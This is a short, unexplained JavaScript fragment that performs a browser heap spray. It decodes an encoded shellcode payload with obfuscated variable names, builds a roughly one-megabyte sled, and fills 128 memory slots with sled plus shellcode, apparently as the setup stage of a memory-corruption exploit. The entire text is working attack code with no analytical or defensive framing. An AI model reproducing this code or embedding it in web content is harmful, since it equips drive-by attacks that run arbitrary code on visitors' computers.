var OGygldZXlWfGwyXHgMQIqPygpWwatfEbgZemhYnKQlo = unescape(
  '%ua3ba%u0c09%udab9%ud9c1%u2474%u5ff4%uc931%u48b1%u5731%u8315%u04c7%u5703%ue211%uf556%u3fe4%u0698%u5ff5%ue311%u4dc4%u6745%u4274%u250e%u2975%ude42%u5f0e%ud14a%ueaa7%udcac%udb38%ub270%u7dfb%uc90c%u5e2f%u022d%u9f22%u7f6a%ucdcd%u0b23%ue27c%u4940%u89bd%u5e1a%u6ec5%u5fe8%u20e4%u0667%uc226%u32a4%udc6f%u79a9%u5739%u0919%ub1b8%uf250%ufd8a%ucd3e%uf022%u093f%ueb84%u614a%u96f6%ub24c%u4c84%u27d9%u062e%u8c79%ucbce%u471f%ua0dc%u0f54%u37c1%u3bb9%ubcfd%uec3c%u8677%u281a%u5cd3%u6903%u33b9%u693c%ueb65%ue198%uf884%uab95%ucdc0%u5397%u5a11%u20a0%uc523%uaf1a%u8e0f%u2884%ua56f%ua670%u468e%uee80%u1254%u98d0%u1b7d%u58bb%uce81%u096b%ua12d%uf9cb%u118d%u13a3%u4d02%u1bd3%ue6c8%ue179%u779b%ue97d%ue05a%ue97f%u974d%u0ff6%u4707%u875e%ufeb0%u53fb%ufe20%u19d6%u7462%uded4%u7d2d%ucc91%u8dda%uafec%u914d%udadb%u0771%u4ce7%ubf25%ua9e5%u6001%u9c16%ua919%u5f82%ud676%u6042%u8086%u6008%u74ee%u3368%u7b0b%u27a5%uee80%u1e45%ub874%u9c2d%u8ea3%u5ff2%u0e86%u89cf%u94ef%ubc39%u5503'
)
var HjOaVQFoPihdjjvmScPPnvSqIejWJ = unescape('%u914a%ufd93')
while (HjOaVQFoPihdjjvmScPPnvSqIejWJ.length < 1048544) {
  HjOaVQFoPihdjjvmScPPnvSqIejWJ += HjOaVQFoPihdjjvmScPPnvSqIejWJ
}
HjOaVQFoPihdjjvmScPPnvSqIejWJ = HjOaVQFoPihdjjvmScPPnvSqIejWJ.substring(
  0,
  1048544 - OGygldZXlWfGwyXHgMQIqPygpWwatfEbgZemhYnKQlo.length
)
memory = new Array()
for (i = 0; i < 128; i++) {
  memory[i] =
    HjOaVQFoPihdjjvmScPPnvSqIejWJ + OGygldZXlWfGwyXHgMQIqPygpWwatfEbgZemhYnKQlo
}
